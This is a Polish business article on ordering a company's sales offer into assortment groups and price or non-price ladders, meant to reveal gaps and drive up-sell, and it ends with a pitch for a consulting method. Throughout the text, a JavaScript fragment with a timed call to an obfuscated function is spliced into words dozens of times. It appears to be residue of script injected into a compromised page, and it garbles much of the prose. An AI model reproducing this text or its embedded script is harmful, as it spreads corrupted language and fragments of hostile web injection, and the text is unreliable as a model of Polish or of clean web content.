In Artykuły, Handel, Uniwersalne

Nie muszą. Choć dobrze jest, jeśli oferta sprzedażowa jest jakoś wewnętrznie uporządkowana. Jednak nie musi i na początku działalności nie jest. Ale z czasem, gdy rosną kompetencje, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się zmienia. I war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, żeby była spójna i logiczna. Są jednak rozmaite możliwości, jak taką logikę wprowadzić.

Jak zmienia się oferta wraz ze wzrostem kompetencji sprzedającego. Z czasem przestaje on czerpać korzyści z chaosu (co eliminuje duże i niestatystyczne błędy), a zaczyna korzystać ze świadomego uporządkowania.

Uwaga. „przypadek dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tes dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towanie wielu możliwości”. Uporządkowanie oferty rodzi niebezpieczeństwo, ze jeśli zrobi się dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to źle, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to na pełną skalę. Z tego punktu widzenia chaos testuje wiele małych rozwiązań. Ale kiedy już się przetestuje, war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wykorzystać świadome kształ dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towanie oferty. Wtedy zamiast ryzyka błędu będzie korzyść z zarządzania.

Z czasem rosną kompetencje firmy i rozumienie firmy. I korzyści z uporządkowania zaczynają przeważać nad ryzykiem, że firma się pomyli. Wtedy oferta zaczyna być kształ dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towana świadomie i uporządkowany sposób. I dodaje swoje do zarządzania magiczną formułą sprzedaży.

Grupa Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towa

Czyli podstawowa jednostka organizacyjna oferty. Suma Grup Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towych daje kategorię, a kilka kategorii (jeśli firma ma takowe) tworzy ofertę.

Przykład. Kategoria wina czerwone, które składają się z różnych Grup Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towych (wytrawne, półwytrawne, półsłodkie, słodkie). W ramach każdej Grupy istnieje dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to samo kryterium wyszukiwania, czyli cena. Ale może być jeszcze szczebel pośredni czyli kraj pochodzenia.

Przykład – pojedyncza Grupa Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towa.

Główne zadanie struktury oferty dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ujawnienie braków

Braków w ofercie. Jeśli uporządkuje się produkty, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to widać, czego brakuje. Właśnie ze względu na strukturę drabinki.

Uwaga. „puste wyniki wyszukiwania”. Odpowiednikiem braków w ofercie są puste wyniki wyszukiwania w e-sklepach. Z jednej strony te sklepy tworzą zaawansowane filtry do poszukiwania i porównywania produktów, z drugiej nie dbają o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby po ich zas dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowaniu klient nie otrzymywał pustego wyniku. W każdej ofercie jest tak samo, z tym, że off-line nie ma takich filtrów, więc firma żyje w nieświadomości, że nie ma problemu.

Rola braków w ofercie

Braki w ofercie wpływają na wszystkie elementy formuły. Zniechęcają do przychodzenia, odprawiają klientów z kwitkiem, w końcu sprzedają mu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to co najtańsze. I dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to w taki sposób, że rzadko jest z tego zadowolony.

Konsekwencje braków w ofercie. Są poważne. I wszystkie mają bezpośredni wpływ na sprzedaż.

Braki w ofercie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to niższa konwersja (przede wszystkim). Trochę też mniejsza odwiedzalność (oferta nie przyciąga). A także niższa niż potencjalnie możliwa kwota transakcji przez niewykorzystanie potencjału up-sell.

Nie należy mylić tego, czego klienci poszukują, z logiką asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tową. Tak samo, jak nie wszystkie inne zachcianki klientów są spełniane.

Uwaga. „nie każde pytanie jest znakiem braku w ofercie”. To częsty przypadek, że pracownicy liniowi informują o tym, że k dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś o coś pytał, i tego nie było. A gdyby było dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to by się sprzedało. To duże uproszenie.

Drabinki cenowe

Czyli najczęstszy sposób uporządkowania

Drabinki cenowe przede wszystkim służą up-sell. Trochę też identyfikacji braków w ofercie, ale temu mogą dużo lepiej służyć inne kryteria budowy struktury Grupy Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej. Gdyż pod względem poszukiwania luk drabinka cenowa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie jedyna możliwość. I wcale nie najlepsza.

Drabinka cenowa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie jedyna możliwość

Uporządkowanie Grup Asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towych wg ceny jest najpowszechniejsze. I uznając, że najważniejszym jego zadaniem jest up-sell, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to w dodatku ma głęboki sens. Ale formułą sprzedaży można też skutecznie zarządzać w inny sposób. A wtedy drabinka cenowa może się zamienić w drabinkę asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tową innego rodzaju. Choć nadal pozostanie drabinką.

Jeśli firma sprzedaje np. balony albo lody, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to wszystkie mogą być w tej samej cenie, ale w różnych smakach czy kolorach. A dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zwiększy wybór, atrakcyjność Konceptu i tym samym zarówno liczbę kontaktów, jak i konwersję. Ale rzadko średnią war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość transakcji, choć duży wybór może skłonić do zakupu trzech kulek zamiast dwóch.

Jeśli firma sprzedaje świnki morskie, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ważna jest sierść (krótka lub długa, a także płeć). To także zwiększy atrakcyjność i konwersję, ale dla średniej war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości transakcji nie ma dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to praktycznie znaczenia.

Podobnie może być z oprocen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaniem kredytów, lekarstwem z zawar dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tością substancji czynnej czy jakimkolwiek elementem, jaki ma znaczenie dla wyboru produktu przez klienta.

Sam mechanizm drabinki asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej innej niż cenowa funkcjonuje w ten sam sposób, jak przy drabince cenowej. Ale tylko dwuwymiarowo. Drabinka nadal identyfikuje braki (przez co rośnie konwersja). Może też mieć znaczenie dla stworzenia wrażenia wyboru, co z kolei może i powinno wpływać na odwiedzalność.

Trudno już jednak o wpływ na średnią war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość transakcji. Ten element sterowania sprzedażą jest już poza zasięgiem, przynajmniej przy pomocy drabinki (nadal można jednak na niego wpływać w inny sposób, np. przez cross-sell).

Jeśli potencjał wzrostu sprzedaży w postaci dwóch pierwszych parametrów (gęs dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tość drabinki i dopasowanie do oczekiwań klientów) jest wystarczający i przekracza ten w postaci up-sell, war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się zdecydować właśnie na taki system uporządkowania oferty.

To trzeba zawsze ocenić, albo świadomie albo empirycznie. I zdecydować, co daje większy potencjał w sterowaniu sprzedażą.

Podsumowanie

Dobrze jest, jeśli oferta firmy jest jakoś uporządkowana (oczywiście zakładając kompetencje firmy w tym zakresie). Wtedy można ją wykorzystać do świadomego zarządzania sprzedażą, w postaci zarządzania magiczną formułą sprzedaży.

Jednak oferta wpływa na poszczególne elementy formuły w różny sposób i może się okazać, że uporządkowanie wg innego kryterium niż cena może dać większy potencjał wzrostu. Przede wszystkim wtedy, gdy dopasowanie do kryteriów poszukiwania (czemu służy inna niż cenowa drabinka asortymen dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towa) daje lepszy efekt niż up-sell (czemu przede wszystkim służy drabinka cenowa).

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.